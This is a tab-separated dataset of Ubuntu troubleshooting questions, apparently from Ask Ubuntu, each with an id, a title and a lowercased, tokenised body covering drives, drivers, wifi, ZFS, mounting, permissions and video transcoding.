460048	external usb3 hard drive not recognized	i have usb3 hard drive when i plug it nothing appears . dmesg says that the device is disconnected . is there anything i can do ? dmesg output : [ 18563.144738 ] usb 4-2 : new superspeed usb device number 2 using xhci_hcd [ 18563.162559 ] usb 4-2 : new usb device found , idvendor=125f , idproduct=a21a [ 18563.162562 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 18563.162564 ] usb 4-2 : product : hv610 [ 18563.162566 ] usb 4-2 : manufacturer : adata [ 18563.162567 ] usb 4-2 : serialnumber : 43a215a1209b [ 18563.163621 ] usb-storage 4-2:1.0 : usb mass storage device detected [ 18563.163698 ] scsi10 : usb-storage 4-2:1.0 [ 18563.372760 ] usb 4-2 : usb disconnect , device number 2 i am using ubuntu 14.04 and gnome 3.10 .
460051	keyboard layout do not fit	i have a problem with keyboard layout on ubuntu 13.10 . my regional settings are italian and also the keyboard seems ( in the settings menu is selected italian one ) but when i digit special button i discover is english setted . it happened sometimes ( i do not understand when ) when i restart the pc . my notebook is a dell 640m .
460052	which dock is lighter in ram and cpu usage ?	i am running ubuntu 14.04 ( 32-bit ) . i have 1gb ram , 3ghz intel p4 processor . i know that different docks are available from this question . docky avant window navigator cairo-dock etc ... and so on . i want to install customizable dock . but which dock is lighter in consumption of ram and cpu usage ? ( no requirement of high graphical animation )
460053	install latest intel-video driver on ubuntu 12.04	i 'm having troubles when capturing video with guvcview , in a random way the xorg server crashes and the session is restarted . i made a post on xorg list and they suggest me install the latest intel - video driver . the problem is that intel does n't have the installer of the latest driver for ubuntu 12.04 . ubuntu 12.04 was deprecated for they , thing sounds reasonable . so the alternative that i have : 1 ) install the driver from source . 2 ) make a backport from the driver for 14.04 to 12.04 . 3 ) something else ( upgrade the distribution is n't an alternative ) . what path you suggest me to follow . thanks in advance . gustavo .
460057	ubuntu 14.04 crashes	i installed ubuntu 14.04 ( clean install ) . i like it a lot , but the system would freeze and computer sometimes would even restart by itself . does anyone else have the same issue and how it can be resolved ? the crashes would happen about every 30 minutes , but mostly when i watch youtube videos ( but this could be coincedence ) . i installed 12.04 , and everything is fine now , but i would really like to upgrade .
460058	remove chrome shortcuts from app menu	anyone knows how to remove `` web apps '' i made in chrome using menu = > extra = > create shortcuts ( no real chrome apps ) from the app menu in ubuntu ? when right-clicking on a normal app ( thunderbird in this case ) , i see this : i use dutch language but i think it 's obvious : note the `` de誰nstalleren '' ( uninstall ) button next to the start button . but , when i right-click on a chrome web app ( which i made from the menu = > extra = > create shortcuts ) , in this case facebook , it shows me this : note the difference ? no uninstall option . can i achieve this in another way ? thanks in advance ! p.s . : i 'm not a professional . i use ubuntu three days now . please keep it simple for me . : )
460061	keyboard stops working , ca n't login from locked screen window	i left my pc and when i returned the screen was locked . i can move the mouse and see the whole screen , but i ca n't type . this seemed to happen randomly , and only a hard reset helps in this case . please help !
460062	compatibility with office suite wordperfect from corel ?	since support for xp-home sp3 ran out i am considering an operating system such as ubuntu or other linux version . i presently have the office suite from corel - word perfect which i want to keep in any event because it is perfect for my needs as regards fonts , formatting , embedding pictures , graphics , long texts , transformation into pdfs etc . hence my question : is there a linux based operating system which is fully compatible with corel 's office suite word perfect ?
460066	openssl version within apache	i have installed ( long time ago ) apache server on ubuntu 12.04 . how could i know the openssl version my server is using ?
460069	how do i remove/disable the chrome/chromium notification-center system indicator ?	after upgrading recently , i noticed that when running chromium , there is a new bell icon in the system indicators area in the upper right . the menu gives the options as such : chromium - notifications do not disturb do not disturb for one hour do not disturb for one day are these options only available via the system indicators menu , or can i remove this icon from my view , and access the same options somewhere else ? how would i go about removing this ?
460071	ubuntu 14.04 rt3290 driver is not working , soft blocked	in ubuntu 14.04 , wifi driver is not working . i completed this suggest ralink rt3290 wifi driver is not working in ubuntu 14.04 but nothing better . i just did following this how do i get a ralink rt3290 wireless card working ? but there is error at step 6 when i typed `` make '' . this is more information : $ rfkill list 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no and nuttapon @ clarent : ~ $ lshw warning : you should run this program as super-user . clarent description : computer width : 64 bits capabilities : vsyscall32 *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 3796mib *-cpu product : intel ( r ) core ( tm ) i7-4700hq cpu @ 2.40ghz vendor : intel corp. physical id : 1 bus info : cpu @ 0 size : 800mhz capacity : 800mhz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cpufreq *-pci description : host bridge product : xeon e3-1200 v3/4th gen core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 06 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200 v3/4th gen core processor pci express x16 controller vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 06 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : e000 ( size=4096 ) memory : f6000000-f70fffff ioport : c0000000 ( size=301989888 ) *-display description : 3d controller product : gk107m [ geforce gt 745m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:50 memory : f6000000-f6ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f7400000-f77fffff memory : b0000000-bfffffff ioport : f000 ( size=64 ) *-multimedia:0 description : audio device product : xeon e3-1200 v3/4th gen core processor hd audio controller vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 06 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:47 memory : f7a14000-f7a17fff *-usb:0 description : usb controller product : 8 series/c220 series chipset family usb xhci vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:43 memory : f7a00000-f7a0ffff *-communication description : communication controller product : 8 series/c220 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:45 memory : f7a1e000-f7a1e00f *-usb:1 description : usb controller product : 8 series/c220 series chipset family usb ehci # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f7a1c000-f7a1c3ff *-multimedia:1 description : audio device product : 8 series/c220 series chipset high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : f7a10000-f7a13fff *-pci:1 description : pci bridge product : 8 series/c220 series chipset family pci express root port # 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : d4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) memory : af200000-af3fffff ioport : af400000 ( size=2097152 ) *-pci:2 description : pci bridge product : 8 series/c220 series chipset family pci express root port # 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : d4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:18 memory : f7900000-f79fffff *-network disabled description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : ra0 version : 00 serial : 1c:3e:84 : c1:09 : d7 width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ralink wlan latency=0 multicast=yes wireless=ralink sta resources : irq:18 memory : f7910000-f791ffff *-generic unclaimed description : bluetooth product : rt3290 bluetooth vendor : ralink corp. physical id : 0.1 bus info : pci @ 0000:03:00.1 version : 00 width : 32 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory : f7900000-f790ffff *-pci:3 description : pci bridge product : 8 series/c220 series chipset family pci express root port # 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : d4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 ioport : d000 ( size=4096 ) memory : f7800000-f78fffff *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 10 serial : 74 : d0:2b : c4:54:14 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full ip=192.168.1.39 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:49 memory : f7800000-f783ffff ioport : d000 ( size=128 ) *-usb:2 description : usb controller product : 8 series/c220 series chipset family usb ehci # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7a1b000-f7a1b3ff *-isa description : isa bridge product : hm86 express lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:44 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : f7a1a000-f7a1a7ff *-serial unclaimed description : smbus product : 8 series/c220 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7a19000-f7a190ff ioport : f040 ( size=32 ) *-scsi physical id : 2 logical name : scsi2 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd-ram uj8c2 s vendor : matshita physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=open and nuttapon @ clarent : ~ $ sudo lspci -v 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f6000000-f70fffff prefetchable memory behind bridge : 00000000c0000000-00000000d1ffffff capabilities : [ 88 ] subsystem : asustek computer inc. device 11ed capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link capabilities : [ d94 ] # 19 kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 , irq 46 memory at f7400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 , irq 47 memory at f7a14000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] express root complex integrated endpoint , msi 00 kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device 201f flags : bus master , medium devsel , latency 0 , irq 43 memory at f7a00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 70 ] power management version 2 capabilities : [ 80 ] msi : enable+ count=1/8 maskable- 64bit+ kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 , irq 45 memory at f7a1e000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable+ count=1/1 maskable- 64bit+ kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 11ed flags : bus master , medium devsel , latency 0 , irq 16 memory at f7a1c000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 , irq 48 memory at f7a10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : af200000-af3fffff prefetchable memory behind bridge : 00000000af400000-00000000af5fffff capabilities : [ 40 ] express root port ( slot- ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device 11ed capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : f7900000-f79fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device 11ed capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : f7800000-f78fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device 11ed capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 11ed flags : bus master , medium devsel , latency 0 , irq 23 memory at f7a1b000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 04 ) subsystem : asustek computer inc. device 11ed flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asustek computer inc. device 11ed flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7a1a000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 kernel driver in use : ahci 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) subsystem : asustek computer inc. device 11ed flags : medium devsel , irq 3 memory at f7a19000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 01:00.0 3d controller : nvidia corporation gk107m [ geforce gt 745m ] ( rev a1 ) subsystem : asustek computer inc. device 11ed flags : bus master , fast devsel , latency 0 , irq 50 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > capabilities : [ 900 ] # 19 kernel driver in use : nouveau 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie subsystem : foxconn international , inc. device e055 flags : bus master , fast devsel , latency 0 , irq 18 memory at f7910000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-d7-09-c1-84-3e-1c kernel driver in use : rt2860 03:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : foxconn international , inc. device e056 flags : fast devsel , irq 3 memory at f7900000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-d8-09-c1-84-3e-1c 04:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) subsystem : qualcomm atheros device 1091 flags : bus master , fast devsel , latency 0 , irq 49 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at d000 [ size=128 ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] express endpoint , msi 00 capabilities : [ c0 ] msi : enable+ count=1/16 maskable+ 64bit+ capabilities : [ d8 ] msi-x : enable- count=16 masked- capabilities : [ 100 ] advanced error reporting capabilities : [ 180 ] device serial number ff-c4-54-14-74-d0-2b-ff kernel driver in use : alx what should i do ? thank you in advance . when i type sudo make or make , i got this error make [ 2 ] : *** [ /home/nuttapon/downloads/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/rt_linux.o ] error 1 make [ 1 ] : *** [ _module_/home/nuttapon/downloads/dpo_rt3290_linuxsta_v2600_20120508/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ linux ] error 2
460078	can not replace missing disk in raidz	my raidz is degraded after the change of my motherboard - a disk can not be found . the missing disk used to be /dev/sdh but now it is named /dev/sdg - which is the cause of the problem . in the degraded zpool i managed to offline the missing disk by using its uid ( which i found using the zdb command ) . so now the degraded pool looks like this : pool : media state : degraded status : one or more devices has been taken offline by the administrator . sufficient replicas exist for the pool to continue functioning in a degraded state . action : online the device using 'zpool online ' or replace the device with 'zpool replace ' . scrub : scrub completed after 2h10m with 0 errors on thu may 1 14:02:43 2014 config : name state read write cksum media degraded 0 0 0 raidz1-0 online 0 0 0 disk/by-id/ata-wdc_wd2003fyys-02w0b0_wd-wmay00171958 online 0 0 0 disk/by-id/ata-wdc_wd2003fyys-02w0b1_wd-wcay00424060 online 0 0 0 disk/by-id/ata-wdc_wd2003fyys-02w0b1_wd-wmay04082675 online 0 0 0 raidz1-1 degraded 0 0 0 sde online 0 0 0 sdf online 0 0 0 sdh offline 0 0 0 however , i do not succeed in replacing /dev/sdh by /dev/sdg : zpool replace media 3840188586753206212 /dev/disk/by-id/ata-wdc_wd20ezrx-00d8pb0_wd-wmc4m1843609 -f invalid vdev specification the following errors must be manually repaired : /dev/disk/by-id/ata-wdc_wd20ezrx-00d8pb0_wd-wmc4m1843609 is part of active pool 'media' ... how can i solve this problem ?
460079	ubuntu how to mount an ntfs with me as owner	so far : sudo mount -t ntfs -o rw , auto , user , fmask=0000 , dmask=0000 /dev/sdc1 /media/bb works fine , every permission is set to read and write , now all i need is for the owner not to be `` root '' what can i do to mount the ntfs with me as owner ? is there any modification i can to the above command ? like user= '' me '' ? or what ? ive searched far and wide and cant find so much things mount help is not verry helpful mount -- help usage : mount -v : print version mount -h : print this help mount : list mounted filesystems mount -l : idem , including volume labels so far the informational part . next the mounting . the command is `mount [ -t fstype ] something somewhere ' . details found in /etc/fstab may be omitted . mount -a [ -t|-o ] ... : mount all stuff from /etc/fstab mount device : mount device at the known place mount directory : mount known device here mount -t type dev dir : ordinary mount command note that one does not really mount a device , one mounts a filesystem ( of the given type ) found on the device . one can also mount an already visible directory tree elsewhere : mount -- bind olddir newdir or move a subtree : mount -- move olddir newdir one can change the type of mount containing the directory dir : mount -- make-shared dir mount -- make-slave dir mount -- make-private dir mount -- make-unbindable dir one can change the type of all the mounts in a mount subtree containing the directory dir : mount -- make-rshared dir mount -- make-rslave dir mount -- make-rprivate dir mount -- make-runbindable dir a device can be given by name , say /dev/hda1 or /dev/cdrom , or by label , using -l label or by uuid , using -u uuid . other options : [ -nffrsvw ] [ -o options ] [ -p passwdfd ] . for many more details , say man 8 mount .
460080	sudoers entry does not work	i recently updated my ubuntu to 14.04 . i have an script which calls just sudo hidd -- search , that i start to connect my bluetooth mouse . now i made an entry to /etc/sudoers like this : markus all=nopasswd : /usr/bin/local/connect but a new terminal keeps asking me about the password . what have i done wrong ? cheers markus
460083	ubuntu file appearing as directory	i have this php file that somehow is showing as a directory . it still has a php extension but when i cd the file i get : base : cd : satisfaction.php : input/output error when i vim the file it looks like a directory . is there any way to chmod the file or something ? i really do n't want to remake this file as i did not get it up on the svn . ugh ! please help . edit : ls -lah shows : - ? ? ? ? ? ? ? ? ? ? ? ? satisfaction.php edit 2 : chown -r tyejae : tyejae satisfaction.php chown : can not access 'satisfaction.php ' : input/output error edit 3 : file satisfaction.php satisfaction.php : error : can not open 'satisfaction.php ' ( input/output error ) edit 4 : stat satisfaction.php stat : can not stat 'satisfaction.php ' : input/output error edit 5 : cat satisfaction.php cat : satisfaction.php : input/output error
460084	how to place all the `hs_err_pidxxxx`.log into one folder ?	i am currently using ubuntu 13.10 , sometime it got crash and store the error log files into my home directory and it getting more and more , i am planning to store it into 1 folder , but i do n't know how to configure it .
460086	transcoding old mjpeg avi 's to h264	i have a collection of private jpegâs and aviâs ( mjpeg format ) recorded with olympus u5000 camera . as mjpeg is not a suitable format for playing in xbmc , i would like to transcode it to h264 format . the furthest i have got is the following line : avconv -i p3040001.avi -strict experimental -c : v libx264 -b : v 8000k -c : a ac3 -b : a 192k output.mp4 this line converts : avconv version 9.11-6:9.11-2ubuntu2 , copyright ( c ) 2000-2013 the libav developers built on mar 24 2014 06:12:33 with gcc 4.8 ( ubuntu 4.8.2-17ubuntu1 ) guessed channel layout for input stream # 0.1 : mono input # 0 , avi , from 'p3040001.avi ' : metadata : creation_time : 2013-03-04 12:21:39 encoder : olympus u5000 duration : 00:00:01.99 , start : 0.000000 , bitrate : 12920 kb/s stream # 0.0 : video : mjpeg , yuvj422p , 640x480 , 30 fps , 30 tbr , 30 tbn stream # 0.1 : audio : pcm_u8 , 8000 hz , mono , u8 , 64 kb/s to avconv version 9.11-6:9.11-2ubuntu2 , copyright ( c ) 2000-2013 the libav developers built on mar 24 2014 06:12:33 with gcc 4.8 ( ubuntu 4.8.2-17ubuntu1 ) input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'output.mp4 ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 creation_time : 2013-03-04 12:21:39 encoder : lavf54.20.3 duration : 00:00:02.09 , start : 0.000000 , bitrate : 35 kb/s stream # 0.0 ( und ) : video : h264 ( high ) , yuv420p , 640x480 , 17 kb/s , 30 fps , 30 tbr , 30 tbn , 60 tbc metadata : creation_time : 2013-03-04 12:21:39 stream # 0.1 ( und ) : audio : aac , 8000 hz , mono , fltp , 9 kb/s metadata : creation_time : 2013-03-04 12:21:39 as you can see , i have a problem with audio . in output.mp4 there is no audio at all . i would like to use avconv because i have bunch of files on my xubuntu 14.04 server . what i am doing wrong ? regards .
460089	system settings wo n't load after ubuntu 14.04 installation	since i installed ubuntu 14.04 , system setting wo n't load . i click on it in the dash and my mouse indicates it is thinking , but then stops and never loads the system settings . the same is true with appearance and display ( i have n't tried all options ) . help ?
460092	why is desktop taking too long to come up ?	i have ubuntu 12.04 lts installed on my machine with gnome shell 3.4.1 installed . recently , i have installed amd radeon graphics driver from the amd website in my ubuntu . after that i have noticed that after i type my password correctly on the login screen , desktop takes too long to come up . a black screen with a mouse pointer on it shows up for about 5-19 seconds before desktop shows up . can anyone point out the possible solutions or the possible causes of this ?
460095	ubuntu 14.04 not shutting down completely	i recently switched from windows 7 to ubuntu 14.04 lts . when i press shutdown , the screen with the ubuntu logo and dots comes up , and the orange dots start moving , but then stops as soon as it reaches the last two dots . i tried using the instructions from here , but it did n't work . any ideas ? thanks !
460096	upgrade 13.10 to 14.04 can not log into desktop	i upgraded my system76 laptop from 13.10 to 14.04 lts . i used apt-get update then apt-get upgrade from a terminal window . my original intent was to get 13.10 fully updated , then use software updater go go to 14.04 . the update/upgrade appeared to finish normally . the only thing amiss at that point was the chrome browser was frozen . did not seem too important . reboot . the system boots up to the desktop but i can not log in . i enter my passwd , press enter , the passwd dialog box grays out , and then nothing . it goes no further . the mouse cursor moves and the limited menu options in top right menu bar seem to work . i can log in on any on the virtual consoles ( f1 - f6 ) . all files seem to be there . i have not been able find these symptoms addressed . any thoughts ? how do fix my desktop ? one other thing . above the login prompt it reports 14.04 lts . but uname -r shows i 'm still running kernel version 13.08.0-18-generic .
460097	what are the best practices when setting files and folder permissions as a php developer under ubuntu ?	i have created and set the permissions to some files and folders under /var/www/mywebsite . for files 644 and for folders 755 . i am the owner of those files and folders , since i created them under that directory . however , i am not able to write and save the files under /var/www/mywebsite if i change permissions to 777 i can edit them normally but if i upload them to my server , files keep their permissions as 777 and i have to change them back to 755 and 644 . this adds an extra step for total development process , and i was wondering if there is a better practice when working with a php projects and ubuntu . should i move the web folder of apache to another directory , for example home and work from there ? here is the output of ls -l /var/www themhz @ hal9000 : ~ $ ls -l /var/www total 10 drwxr-sr-x 18 themhz root 4096 μάι 3 05:58 mywebsite drwsr-sr-x 18 themhz root 4096 οκτ 28 2013 agorasite.gr drwsr-xr-x 17 themhz themhz 4096 οκτ 28 2013 agorasite drwsr-xr-x 17 themhz root 4096 δεκ 9 2012 aimodosia lrwxrwxrwx 1 root root 22 φεβ 14 09:25 apc.php - > /usr/share/php/apc.php drwsr-xr-x 3 themhz root 4096 αύγ 30 2011 apolo -rw-r -- r -- 1 themhz root 297307 φεβ 20 2013 background5.jpg drwxr-sr-x 3 themhz root 4096 αύγ 17 2013 backups drwsr-xr-x 10 themhz root 4096 ιούλ 2 2012 booking any advises or suggestions for best practices when developing php applications and setting up a dev working system ? my system is running ubuntu 12.04 thank you
